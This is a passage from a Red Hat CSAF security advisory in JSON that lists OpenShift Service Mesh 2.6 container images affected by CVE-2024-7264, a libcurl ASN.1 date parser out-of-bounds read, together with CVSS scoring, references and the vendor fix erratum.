"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le as a component of RHOSSM 2.6 for RHEL 9",
"product_id": "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"relates_to_product_reference": "9Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64 as a component of RHOSSM 2.6 for RHEL 9",
"product_id": "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"relates_to_product_reference": "9Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x as a component of RHOSSM 2.6 for RHEL 9",
"product_id": "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"relates_to_product_reference": "9Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64 as a component of RHOSSM 2.6 for RHEL 9",
"product_id": "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64",
"relates_to_product_reference": "9Base-RHOSSM-2.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-7264",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2024-07-31T04:33:09+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2301888"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libcurl, where libcurl\u0027s ASN1 parser code has the `GTime2str()` function, used for parsing an ASN.1 Generalized Time field. If a syntactically incorrect field is given, the parser can use -1 for the length of the *time fraction*, leading to a `strlen()` performed on a pointer to a heap buffer area that is not purposely NULL terminated.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "curl: libcurl: ASN.1 date parser overread",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-7264"
},
{
"category": "external",
"summary": "RHBZ#2301888",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-7264",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7264"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-7264",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7264"
},
{
"category": "external",
"summary": "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL",
"url": "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL"
}
],
"release_date": "2024-07-31T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
